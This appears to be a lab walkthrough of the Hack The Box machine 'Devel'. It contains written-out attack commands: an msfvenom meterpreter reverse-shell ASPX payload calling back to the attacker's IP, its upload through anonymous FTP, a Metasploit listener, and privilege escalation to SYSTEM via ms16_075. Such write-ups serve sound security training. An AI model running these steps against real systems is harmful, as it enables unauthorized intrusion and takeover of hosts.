Devel


Contents

Intro


Sick day but I try popping a box nonetheless :(

User


Nmap first:

sudo nmap -sC -sV 10.129.1.123

21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       [DIR]          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png

80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE

The host machine is hosting FTP (which picks up files inside of FTP's root directory for some reason?) and an IIS server.

This is what the webserver looks like - nothing fancy, the image simply redirects to Microsoft's iis.net.

Since FTP allows anonymous login, I let myself in, and look for any files and folder of value to me:

ftp> dir
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       [DIR]          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png

I get the two files found inside FTP's root folder, which I assume to be the IIS server's root directory going off of the fact that what's inside of here matches the image above (additionally, accessing http://10.129.1.123/iisstart.htm or http://10.129.1.123/welcome.png shows what the webpage itself would). Going inside aspnet_client (which is good info nonetheless, since we now know it's running on ASP.NET) doesn't yield us anything of use.

Surprisingly enough, we can upload our own files to the webserver's root directory, which brings me much closer to having a reverse shell. To get that, I'll use msfvenom to generate a payload in .aspx:

msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.14.106 LPORT=4567 > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2886 bytes

Following this, I can just upload the file on FTP and set up a listener with msfconsole:

msf](Jobs:0 Agents:0) >> use multi/handler

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload windows/meterpreter/reverse_tcp

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST tun0

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LPORT 4567

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run
[*] Started reverse TCP handler on 10.10.14.106:4567 
[*] Sending stage (177734 bytes) to 10.129.1.123
[*] Meterpreter session 1 opened (10.10.14.106:4567 -> 10.129.1.123:49181) at 2026-05-21 13:58:26 -0500

(Meterpreter 1)(c:\windows\system32\inetsrv) >

This nets us a meterpreter as web!

Root


(Meterpreter 1)(c:\windows\system32\inetsrv) > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

No architecture mismatch this time around - what I do have instead is a *very* outdated Windows (dating back to 2009) - 100% prone to privesc exploits. Using local_exploit_suggester, I found a couple which give me system:

exploit/windows/local/ms16_075_reflection_juicy    Yes    The target appears to be vulnerable.

This is the one I'll be using today. The only thing I needed to change was LHOST and SESSION this time around.

After running it, we get system access! Good luck to everyone attempting this box!/p>

(Meterpreter 4)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM